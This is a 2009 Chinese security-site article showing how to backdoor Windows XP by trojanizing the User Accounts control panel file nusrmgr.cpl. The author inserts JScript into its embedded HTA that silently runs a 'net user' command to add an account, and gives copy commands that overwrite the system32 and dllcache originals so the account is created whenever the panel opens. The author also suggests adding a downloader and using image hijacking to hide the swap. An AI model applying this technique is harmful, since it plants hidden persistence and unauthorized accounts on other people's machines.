首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
利用cpl文件在xp中留一个后门
来源:http://hi.baidu.com/myvbscript/blog/ 作者:myvbscript 发布时间:2009-07-03  

先请看图:

 

这是我用restorator 打开nusrmgr.cpl时的情形。你看到了什么?是不是很吃惊,原来xp中控制面板中的“用户帐户”选项竟然是html做的。其实不然,微软的好多组件的面板都是html做的。这也是微软为什么一直无法清掉ie的原因,它牵涉太多了,就算是反垄断法也不可能让微软删掉ie的。

看到图中的那个NUSRMGR.HTA文件了吗?我们可以用它来做下手脚(当然你选别的js文件也是可以的)

我们在里边加几行js语句:

var WshShell = CreateObject("WScript.Shell")
WshShell.Run("net.exe user lcx lcx /add", 0, true)

当然你加下载者更好,我只是做个示例。

然后:

echo y|copy nusrmgr.cpl c:\windows\system32\dllcache\nusrmgr.cpl
echo y|copy nusrmgr.cpl c:\windows\system32\nusrmgr.cpl

替换原来的文件。这样以后用户再调用控制面板里的“用户帐户”选项后,就会自动给你加一个帐户了。

这算是一个思路了,应当很鸡肋。如果要完美一点,可以查看一下别的cpl文件如何更改,如何无声无息的替掉原来的文件(如镜像劫持)。


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·AspProductCatalog漏洞分析与利
·0day openssh remote exploit
·渗透利器:强大的溢出工具包--Me
·MSSQL注入利用Group by&having猜
·MSSQL下用UNION和系统表配合猜表
·拿下PHPBB.com的过程(老外写的
·跨站脚本XSS
·The Art of Grey-Box Attack
·通过SQL SERVER远程上传文件的实
·Discuz! 7.0 及以下版本后台拿we
·各类型数据库注入时的一些语句
·渗透中国联通
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved